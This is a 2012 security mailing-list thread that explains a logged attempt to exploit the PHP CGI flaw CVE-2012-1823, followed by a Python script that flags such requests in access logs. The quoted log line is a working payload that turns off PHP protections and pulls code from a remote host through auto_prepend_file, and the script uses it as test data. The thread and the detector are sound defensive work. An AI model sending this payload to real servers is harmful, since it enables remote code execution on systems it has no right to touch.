Good explanation Naik Ji, and I heard that you are in Hyderabad......
congrats .........

On Mon, May 28, 2012 at 1:15 PM, Srinivas Naik <[email protected]> wrote:
> Hi G33Ks,
>
> @ SANS
>
> FYI
>
> Bob detected in his webserver the following string in the access log of
> his web server:
>
> bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
>
> This string is an attempt to exploit the PHP vulnerability
> CVE-2012-1823 <http://www.cvedetails.com/cve/CVE-2012-1823> with
> the remote execution variant. Let's see what each of the options
> invoked means:
>
> - safe_mode=off: PHP disables the capacity of checking if the
>   owner of the current script matches the owner of the file to be operated by
>   a file functionality. This directive has been deprecated on PHP 5.3.0 tree
>   and removed on PHP 5.4.0 tree.
> - disable_functions=null: No function is disabled from the whole
>   amount contained within PHP. This means that insecure functions are
>   available like proc_open, exec, passthru, curl_exec, system, popen,
>   curl_multi_exec and shell_exec. For more information on these functions,
>   please check the PHP manual <http://php.net/manual/en/index.php>.
> - allow_url_fopen=on: This directive allows PHP to open files located
>   in http or ftp locations and operate them as a normal file descriptor.
> - allow_url_include=on: This directive allows to include additional PHP
>   code located in a http or ftp URL into the PHP file before being processed
>   and executed.
> - auto_prepend_file=http://81.17.24.82/info3.php: This directive
>   includes the PHP code located in http://81.17.24.82/info3.php and
>   executes it before the code inside index.php.
>
> You can prevent this by using the latest stable PHP version located at the
> downloads page. If you are using Windows, please be careful because you can
> be affected by the CVE-2012-2376 <http://www.cvedetails.com/cve/CVE-2012-2376/>.
>
> Cheers,
>
> 0xN41K
>
> --
> You received this message because you are subscribed to the Google Groups
> "nforceit" group.
> To post to this group, send an email to [email protected].
> To unsubscribe from this group, send email to
> [email protected].
> For more options, visit this group at
> http://groups.google.com/group/nforceit?hl=en-GB.

--
Rakesh Nagekar
9701887568
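
The access log entry quoted in the thread above, run through a detection check; this is an added example, not part of the original messages. The function names and the two contrast log lines are constructed for illustration, and the check relies on background the thread does not state: php-cgi treats a query string as command-line arguments only when it contains no literal `=`, which is why the probe encodes it as `%3d`.

```python
import re
from urllib.parse import unquote_plus

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# php.ini directives the quoted message walks through.
RISKY = {"safe_mode", "disable_functions", "allow_url_fopen",
         "allow_url_include", "auto_prepend_file"}

# Log entry from the thread, followed by two constructed lines for contrast.
PAGE_LINE = ('bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] '
             '"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL'
             '+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn'
             '+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890')
BENIGN_LINE = '192.0.2.10 - - [24/May/2012:12:18:02 -0700] "GET /index.php?page=2 HTTP/1.1" 200 5120'
SWITCH_ONLY_LINE = '192.0.2.11 - - [24/May/2012:12:19:40 -0700] "GET /index.php?-s HTTP/1.1" 200 812'


def php_cgi_switches(log_line):
    """Return {directive: value} for -d switches in the query, or None if clean."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group("target"):
        return None
    query = m.group("target").split("?", 1)[1]
    decoded = unquote_plus(query)
    # A literal '=' makes the query ordinary form data; only an encoded one
    # (%3d) leaves it eligible to be parsed as command-line arguments.
    if "=" in query or not decoded.startswith("-"):
        return None
    switches = {}
    for arg in decoded.split():
        if arg.startswith("-d") and "=" in arg:
            name, value = arg[2:].split("=", 1)
            switches[name] = value
    return switches


def triage(log_line):
    """Classify one access log line."""
    switches = php_cgi_switches(log_line)
    if switches is None:
        return "clean"
    if RISKY.intersection(switches):
        return "argument-injection with ini override"
    return "argument-injection"
```
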
